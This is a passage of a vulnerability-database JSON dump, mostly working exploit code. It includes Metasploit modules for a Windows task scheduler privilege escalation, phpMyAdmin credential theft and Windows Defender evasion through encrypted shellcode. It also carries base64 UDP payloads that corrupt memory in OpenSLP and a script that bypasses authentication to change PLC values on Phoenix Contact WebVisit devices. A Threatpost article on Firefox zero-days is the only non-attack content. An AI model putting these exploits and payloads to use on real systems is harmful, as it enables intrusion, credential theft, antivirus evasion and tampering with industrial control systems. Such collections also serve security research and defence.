(%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SandboxEscaper', # Original discovery and PoC\n 'bwatters-r7', # msf module\n 'asoto-r7', # msf module\n 'Jacob Robles' # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows 10 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'References' =>\n [\n ['CVE', '2018-8440'],\n ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],\n ],\n 'Notes' =>\n {\n # Exploit overwrites PrintConfig.dll, which makes it unusable.\n 'Stability' => [ OS_RESOURCE_LOSS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n },\n 'DisclosureDate' => 'Aug 27 2018',\n 'DefaultTarget' => 0,\n ))\n\n register_options([OptString.new('PROCESS',\n [false, 'Name of process to spawn and inject dll into.', nil])\n ])\n end\n\n def setup_process(process_name)\n begin\n print_status(\"Launching #{process_name} to host the exploit...\")\n launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)\n process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def inject_magic(process, payload_dll)\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')\n library_path = ::File.expand_path(library_path)\n dll_data = ''\n ::File.open(library_path, 'rb') { |f| dll_data = f.read }\n\n print_status(\"Writing payload dll into process #{process.pid} memory\")\n payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)\n written = process.memory.write(payload_addr, payload_dll)\n\n if written != payload_dll.length\n fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n exploit_mem, offset = inject_dll_data_into_process(process, dll_data)\n process.thread.create(exploit_mem + offset, payload_addr)\n end\n\n def validate_active_host\n sysinfo['Computer']\n true\n rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n false\n end\n\n def validate_target\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n end\n\n def exploit\n unless session.type == 'meterpreter'\n fail_with(Failure::None, 'Only meterpreter sessions are supported')\n end\n\n payload_dll = generate_payload_dll\n process_name = datastore['PROCESS'] || 'notepad.exe'\n\n print_status('Checking target...')\n unless validate_active_host\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n validate_target\n\n print_status(\"Target Looks Good... trying to start #{process_name}\")\n process = setup_process(process_name)\n inject_magic(process, payload_dll)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_error(e.message)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/alpc_taskscheduler.rb"}, {"lastseen": "2019-11-19T17:30:26", "bulletinFamily": "exploit", "description": "This module gathers Phpmyadmin creds from target linux machine.\n", "modified": "2018-09-07T16:13:09", "published": "2018-08-19T18:10:19", "id": "MSF:POST/LINUX/GATHER/PHPMYADMIN_CREDSTEAL", "href": "", "type": "metasploit", "title": "Phpmyadmin credentials stealer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Phpmyadmin credentials stealer\",\n 'Description' => %q{\n This module gathers Phpmyadmin creds from target linux machine.\n },\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['meterpreter'],\n 'Author' => [\n 'Chaitanya Haritash [bofheaded]',\n 'Dhiraj Mishra <dhiraj@notsosecure.com>'\n ]\n ))\n end\n\n def parse_creds(contents)\n db_user = contents.scan(/\\$dbuser\\s*=\\s*['\"](.*)['\"];/).flatten.first\n db_pass = contents.scan(/\\$dbpass\\s*=\\s*['\"](.*)['\"];/).flatten.first\n\n unless db_user && db_pass\n print_error(\"Couldn't find PhpMyAdmin credentials\")\n return\n end\n\n print_good(\"User: #{db_user}\")\n print_good(\"Password: #{db_pass}\")\n\n print_status(\"Storing credentials...\")\n store_valid_credential(user: db_user, private: db_pass)\n end\n\n def run\n print_line(\"\\nPhpMyAdmin Creds Stealer!\\n\")\n\n if session.platform.include?(\"windows\")\n print_error(\"This module is not compatible with windows\")\n return\n end\n\n conf_path = \"/etc/phpmyadmin/config-db.php\"\n unless file_exist?(conf_path)\n print_error(\"#{conf_path} doesn't exist on target\")\n return\n end\n\n print_good('PhpMyAdmin config found!')\n res = read_file(conf_path)\n unless res\n print_error(\"You may not have permissions to read the file.\")\n return\n end\n\n print_good(\"Extracting creds\")\n parse_creds(res)\n\n p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')\n print_good(\"Config file located at #{p}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/phpmyadmin_credsteal.rb"}, {"lastseen": "2019-12-09T18:28:56", "bulletinFamily": "exploit", "description": "This module allows you to generate a Windows EXE that evades against Microsoft Windows Defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metasm, and anti-emulation are used to achieve this. For best results, please try to use payloads that use a more secure channel such as HTTPS or RC4 in order to avoid the payload network traffic getting caught by antivirus better.\n", "modified": "2018-10-06T21:04:07", "published": "2018-08-02T16:54:38", "id": "MSF:EVASION/WINDOWS/WINDOWS_DEFENDER_EXE", "href": "", "type": "metasploit", "title": "Microsoft Windows Defender Evasive Executable", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/compiler/windows'\n\nclass MetasploitModule < Msf::Evasion\n\n def initialize(info={})\n super(merge_info(info,\n 'Name' => 'Microsoft Windows Defender Evasive Executable',\n 'Description' => %q{\n This module allows you to generate a Windows EXE that evades against Microsoft\n Windows Defender. Multiple techniques such as shellcode encryption, source code\n obfuscation, Metasm, and anti-emulation are used to achieve this.\n\n For best results, please try to use payloads that use a more secure channel\n such as HTTPS or RC4 in order to avoid the payload network traffic getting\n caught by antivirus better.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Targets' => [ ['Microsoft Windows', {}] ]\n ))\n end\n\n def rc4_key\n @rc4_key ||= Rex::Text.rand_text_alpha(32..64)\n end\n\n def get_payload\n @c_payload ||= lambda {\n opts = { format: 'rc4', key: rc4_key }\n junk = Rex::Text.rand_text(10..1024)\n p = payload.encoded + junk\n\n return {\n size: p.length,\n c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)\n }\n }.call\n end\n\n def c_template\n @c_template ||= %Q|#include <Windows.h>\n#include <rc4.h>\n\n// The encrypted code allows us to get around static scanning\n#{get_payload[:c_format]}\n\nint main() {\n int lpBufSize = sizeof(int) * #{get_payload[:size]};\n LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x00000040);\n memset(lpBuf, '\\\\0', lpBufSize);\n\n HANDLE proc = OpenProcess(0x1F0FFF, false, 4);\n // Checking NULL allows us to get around Real-time protection\n if (proc == NULL) {\n RC4(\"#{rc4_key}\", buf, (char*) lpBuf, #{get_payload[:size]});\n void (*func)();\n func = (void (*)()) lpBuf;\n (void)(*func)();\n }\n\n return 0;\n}|\n end\n\n def run\n vprint_line c_template\n # The randomized code allows us to generate a unique EXE\n bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)\n print_status(\"Compiled executable size: #{bin.length}\")\n file_create(bin)\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/evasion/windows/windows_defender_exe.rb"}], "threatpost": [{"lastseen": "2019-11-04T07:09:59", "bulletinFamily": "info", "description": "UPDATE\n\nMozilla has fixed a high-severity vulnerability in its Firefox browser being actively exploited in the wild.\n\nThe vulnerability (CVE-2019-11708) is separate from a [critical flaw under active attack](<https://threatpost.com/mozilla-patches-firefox-critical-flaw-under-active-attack/145814/>) that was patched earlier this week ([CVE-2019-11707](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11707>)). However, both vulnerabilities were discovered by Coinbase Security, who said that the flaws were being used in active spear phishing attacks targeting Coinbase employees.\n\nThe high-severity sandbox-escape flaw stems from insufficient vetting of \u201cPrompt:Open\u201d inter process communication (IPC) messages, which are passed between different processes on the browser. The flaw \u201ccan result in the non-sandboxed parent process opening web content chosen by a compromised child process,\u201d according to Mozilla\u2019s [advisory](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWhen combined with additional vulnerabilities this could result in executing arbitrary code on the user\u2019s computer,\u201d according to Mozilla.\n\nMozilla said that Firefox 67.0.4 and Firefox ESR 60.7.2 fix the issue.\n\nCoinbase chief information security officer Philip Martin[ said on Twitter,](<https://twitter.com/SecurityGuyPhil/status/1141466335592869888>) Wednesday, that Coinbase had spotted both this high-severity flaw, as well as the critical flaw patched earlier this week, being exploited by an attacker who was targeting Coinbase employees.\n\nMartin said he has seen no evidence of attacks targeting Coinbase customers \u2013 and that Coinbase was not the only cryptocurrency organization targeted in the campaign.\n\n> 3/ We\u2019ve seen no evidence of exploitation targeting customers. We were not the only crypto org targeted in this campaign. We are working to notify other orgs we believe were also targeted. We\u2019re also releasing a set of IOCs that orgs can use to evaluate their potential exposure.\n> \n> \u2014 Philip Martin (@SecurityGuyPhil) [June 19, 2019](<https://twitter.com/SecurityGuyPhil/status/1141466337639747584?ref_src=twsrc%5Etfw>)\n\n\u201cWe walked back the entire attack, recovered and reported the 0-day to firefox, pulled apart the malware and infra used in the attack and are working with various orgs to continue burning down attacker infrastructure and digging into the attacker involved,\u201d he said on Twitter.\n\nMartin said that a more detailed analysis will be released next week.\n\nThe critical flaw patched earlier this week ([CVE-2019-11707](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11707>)) is a type confusion vulnerability in the Array.pop, which is an array method that is used in JavaScript objects in Firefox. The vulnerability, under active attack, enables bad actors to take full control of systems running the vulnerable Firefox versions.\n\nTor Browser also [updated to version 8.5.2](<https://threatpost.com/tor-browser-update-critical-flaw/145857/>) in response to the critical Firefox flaw (The issue affects Tor, since, as its founders said back in 2016, Firefox is at the heart of the privacy-focused onion browser).\n\n\u201cOn Monday, June 17, 2019, Coinbase reported a vulnerability used as part of targeted attacks for a spear phishing campaign,\u201d Selena Deckelmann, senior director of Firefox Browser Engineering, told Threatpost. \u201cIn less than 24 hours, we released a fix for the exploit.\u201d\n\n_This article was updated on June 26 at 8am to reflect the correct CVE for the vulnerability, CVE-2019-11708 (not CVE-2019-11709)._\n", "modified": "2019-06-21T15:22:23", "published": "2019-06-21T15:22:23", "id": "THREATPOST:BA5F8412B5B698E2CD2642F255B022AC", "href": "https://threatpost.com/mozilla-fixes-second-actively-exploited-firefox-flaw/145893/", "type": "threatpost", "title": "Mozilla Fixes Second Actively-Exploited Firefox Flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-11-10T02:18:49", "bulletinFamily": "exploit", "description": "", "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "PACKETSTORM:150240", "href": "https://packetstormsecurity.com/files/150240/OpenSLP-2.0.0-Out-Of-Bounds.html", "title": "OpenSLP 2.0.0 Out-Of-Bounds", "type": "packetstorm", "sourceData": "` _ _ \n/ | ___ ___ ___ ___ ___| |___ \n_ / / | . | . | -_| |_ -| | . | \n|_|_/ |___| _|___|_|_|___|_| _| \n|_| |_| \n \n2018-11-07 \n \nMORE BUGS IN OPENSLP-2.0.0 \n========================== \n \nI discovered some bugs in openslp-2.0.0 back in January, 2018. \nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free), \nand today I'm disclosing two more. \n \n \nBUG 1 \n===== \n \nThis issue is an OOB read that does not crash the application. \nSo in terms of exploitation it is not very interesting. If that's what \nyou're here for then scroll down to bug#2. \nAfter the occurence of the bug the application actually detects the error \nand ignores the malicious packet. Therefore, it could be argued that this \nis not a bug at all. Nevertheless, here it is: \n \nProof of concept exploit: \n \necho -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427 \n \nValgrind report: \n \n==27968== Invalid read of size 1 \n==27968== at 0x412436: GetUINT16 (slp_message.c:63) \n==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327) \n==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005) \n==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393) \n==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) \n==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) \n==27968== by 0x40256B: main (slpd_main.c:699) \n==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd \n==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67) \n==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139) \n==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383) \n==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) \n==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) \n==27968== by 0x40256B: main (slpd_main.c:699) \n \nAnalysis: \n \nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes \nare read from the packet and interpreted as integers used as length fields. \nOne of them is the scopelistlen, parsed on line 321, and further used as \nargument for the amount of bytes to increment the buffer->curpos pointer \nin the the GetStrPtr function, shown below on line 112. It now points to \nuninitialized memory. \n \nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \npointer is dereferenced. \n \nSubsequently the comparison on line 329 evaluates to true since the \nbuffer->curpos now points to memory located after the buffer->end \npointer. The application therefore stops processing the malicious packet. \n \n291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg) \n292 { \n293 int result; \n294 \n295 /* 0 1 2 3 \n296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 \n297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n298 | <URL-Entry> \\ \n299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n300 | length of service type string | <service-type> \\ \n301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n302 | length of <scope-list> | <scope-list> \\ \n303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n304 | length of attr-list string | <attr-list> \\ \n305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ \n306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\ \n307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */ \n308 \n309 /* Parse the <URL-Entry>. */ \n310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry); \n311 if (result != 0) \n312 return result; \n313 \n314 /* Parse the <service-type> string. */ \n315 srvreg->srvtypelen = GetUINT16(&buffer->curpos); \n316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen); \n317 if (buffer->curpos > buffer->end) \n318 return SLP_ERROR_PARSE_ERROR; \n319 \n320 /* Parse the <scope-list> string. */ \n321 srvreg->scopelistlen = GetUINT16(&buffer->curpos); \n322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen); \n323 if (buffer->curpos > buffer->end) \n324 return SLP_ERROR_PARSE_ERROR; \n325 \n326 /* Parse the <attr-list> string. */ \n327 srvreg->attrlistlen = GetUINT16(&buffer->curpos); \n328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen); \n329 if (buffer->curpos > buffer->end) \n330 return SLP_ERROR_PARSE_ERROR; \n \n54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word. \n55 * \n56 * @param[in,out] cpp - The address of a pointer from which to extract. \n57 * \n58 * @return A 16-bit unsigned value in native format; the buffer pointer \n59 * is moved ahead by 2 bytes on return. \n60 */ \n61 uint16_t GetUINT16(uint8_t ** cpp) \n62 { \n63 uint16_t rv = AS_UINT16(*cpp); \n64 *cpp += 2; \n65 return rv; \n66 } \n... \n96 /** Extract a string buffer address into a character pointer. \n97 * \n98 * Note that this routine doesn't actually copy the string. It only casts \n99 * the buffer pointer to a character pointer and moves the value at @p cpp \n100 * ahead by @p len bytes. \n101 * \n102 * @param[in,out] cpp - The address of a pointer from which to extract. \n103 * @param[in] len - The length of the string to extract. \n104 * \n105 * @return A pointer to the first character at the address pointed to by \n106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes \n107 * on return. \n108 */ \n109 char * GetStrPtr(uint8_t ** cpp, size_t len) \n110 { \n111 char * sp = (char *)*cpp; \n112 *cpp += len; \n113 return sp; \n114 } \n \n \nProof of discovery: \n \n$ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum \n0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 - \n \ntwitter.com/magnusstubman/status/953909628622069760 \n \n \nPatch: \n \nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it. \n \nBUG 2 \n===== \n \nFirst and foremost, I'm not claiming credit for this bug since it was \napparently discovered by Reno Robert and publicly disclosed on the \noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567 \nthe day after. \n \nopenwall.com/lists/oss-security/2016/09/27/4 \nopenwall.com/lists/oss-security/2016/09/28/1 \n \nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I \nreported it to the maintainers who made me aware of the earlier discovery. \nWhat puzzled me was that no announcement had been made and the fact that \nthe latest stable version on their website is still vulnerable! I found it \n2017-12-06 and reported it 2018-01-18. See further down for proof of \ndiscovery. \n \nI havn't been able to find any exploit for this bug anywhere. Therefore, \nI'm today disclosing a proof-of-concept exploit for the bug to increase \nattention on the issue. \n \nExploit: \n \necho -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427 \n \nValgrind report: \n \n==56913== Invalid write of size 1 \n==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914) \n==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210) \n==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374) \n==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) \n==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) \n==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) \n==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) \n==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) \n==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) \n==56913== by 0x402383: main (slpd_main.c:699) \n==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd \n==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356) \n==56913== by 0x410096: SLPCompareString (slp_compare.c:365) \n==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) \n==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) \n==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) \n==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) \n==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) \n==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) \n==56913== by 0x402383: main (slpd_main.c:699) \n \nThe while loop on line 207 fails to perform bounds checking, and as such \nmay end up incrementing the pointer p up to a point such that p is bigger \nthan ep. Thus, the third argument to memmove on line 2010 becomes negative. \nHowever, since memmove accepts a size_t (which is unsigned) the value wraps \naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove \nattempting to move an excessive amount of memory, resulting in OOB write. \n \n184 /** fold internal white space within a string. \n185 * \n186 * folds all internal white space to a single space character within a \n187 * specified string. modified the @p str parameter with the result and \n188 * returns the new length of the string. \n189 * \n190 * @param[in] len - the length in bytes of @p str. \n191 * @param[in,out] str - the string from which extraneous white space \n192 * should be removed. \n193 * \n194 * @return the new (shorter) length of @p str. \n195 * \n196 * @note this routine assumes that leading and trailing white space have \n197 * already been removed from @p str. \n198 */ \n199 static int slpfoldwhitespace(size_t len, char * str) \n200 { \n201 char * p = str, * ep = str + len; \n202 while (p < ep) \n203 { \n204 if (isspace(*p)) \n205 { \n206 char * ws2p = ++p; /* point ws2p to the second ws char. */ \n207 while (isspace(*p)) /* scan till we hit a non-ws char. */ \n208 p++; \n209 len -= p - ws2p; /* reduce the length by extra ws. */ \n210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */ \n211 } \n212 p++; \n213 } \n214 return (int)len; \n215 } \n \nProof of discovery: \n \n$ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum \n5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 - \n \ntwitter.com/magnusstubman/status/938317849474555904 \n \nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \n \nREFERENCES \n========== \n \n- sourceforge.net/p/openslp/bugs/161 \n- sourceforge.net/p/openslp/bugs/160 \n- twitter.com/magnusstubman/status/938317849474555904 \n- twitter.com/magnusstubman/status/953909628622069760 \n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \n- openwall.com/lists/oss-security/2016/09/27/4 \n- openwall.com/lists/oss-security/2016/09/28/1 \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150240/openslp200-oob.txt"}, {"lastseen": "2018-10-13T02:13:21", "bulletinFamily": "exploit", "description": "", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "PACKETSTORM:149776", "href": "https://packetstormsecurity.com/files/149776/Phoenix-Contact-WebVisit-2985725-Authentication-Bypass.html", "title": "Phoenix Contact WebVisit 2985725 Authentication Bypass", "type": "packetstorm", "sourceData": "`# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass \n# Date: 2018-09-30 \n# Exploit Author: Deneut Tijl \n# Vendor Homepage: www.phoenixcontact.com \n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5 \n# Version: WebVisit (all versions) \n# CVE : CVE-2016-8380, CVE-2016-8371 \n \n# Description \n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection) \n# Steps: \n# * Get Project Name: http://<ip>/ \n# * Get list of tags: http://<ip>/<projectname>.tcr \n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe \n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!) \n \n# CVE-2016-8380-SetPLCValues.py \n \n#! /usr/bin/env python \n \nimport urllib2 \n \nstrIP = raw_input('Please enter an IP [192.168.1.200]: ') \nif strIP == '': strIP = '192.168.1.200' \n \ntry: \nURLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': no response') \nraw_input('Press Enter to exit') \nexit() \n \nstrProject = '' \nfor line in URLResponse.readlines(): \nif 'ProjectName' in line: \nstrProject = line.split('VALUE=\"')[1].split('\"')[0] \n \nif strProject == '': \nprint('#### Error, no \\'ProjectName\\' found on the main page') \nraw_input('Press Enter to exit') \nexit() \n \nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags') \n \ntry: \nTagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr')) \nexcept urllib2.HTTPError: \nprint('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found') \nraw_input('Press Enter to exit') \nexit() \n \narrTagList = [] \nfor line in TagResponse.readlines(): \nif line.startswith('#!-- N ='): \nintNumberOfTags = int(line.split('=')[1]) \nprint('---- There should be ' + str(intNumberOfTags) + ' tags:') \nif not line.startswith('#'): \nif not line.split(';')[0].strip() == '': \narrTagList.append(line.split(';')[0].strip()) \nprint('-- '+line.split(';')[0].strip()) \n \n \nraw_input('Press Enter to query them all') \nimport os, urllib \nos.system('cls' if os.name == 'nt' else 'clear') \nstrPost = '<body>' \nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>' \nstrPost += '<item_list>' \nfor item in arrTagList: \nstrPost += '<i><n>' + item + '</n></i>' \nstrPost += '</item_list></body>' \nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read() \n \narrData = [] \nfor item in DataResponse.split('<i>'): \nif '<n>' in item: \nname = item.split('<n>')[1].split('</n>')[0] \nvalue = item.split('<v>')[1].split('</v>')[0] \narrData.append((name,value)) \nprint('----- Full list of tags and their values:') \ni = 0 \nfor item in arrData: \ni += 1 \nprint(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1]) \n \nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ') \nif ans1 == '': \nexit() \nstrTag = arrData[int(ans1) - 1][0] \nstrVal = arrData[int(ans1) - 1][1] \nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ') \nif ans2 == '': ans2 = strVal \nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2))) \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149776/phoenixcwv-bypass.txt"}, {"lastseen": "2018-10-12T02:15:26", "bulletinFamily": "exploit", "description": "", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "PACKETSTORM:149763", "href": "https://packetstormsecurity.com/files/149763/Phoenix-Contact-WebVisit-6.40.00-Password-Disclosure.html", "title": "Phoenix Contact WebVisit 6.40.00 Password Disclosure", "type": "packetstorm", "sourceData": "`# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure \n# Exploit Author: Deneut Tijl \n# Date: 2018-09-30 \n# Vendor Homepage: www.phoenixcontact.com \n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5 \n# Version: WebVisit < 6.40.00 \n# CVE: CVE-2016-8366 \n \n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \n# surely equally vulnerable with WebVisit 6.40.00, the 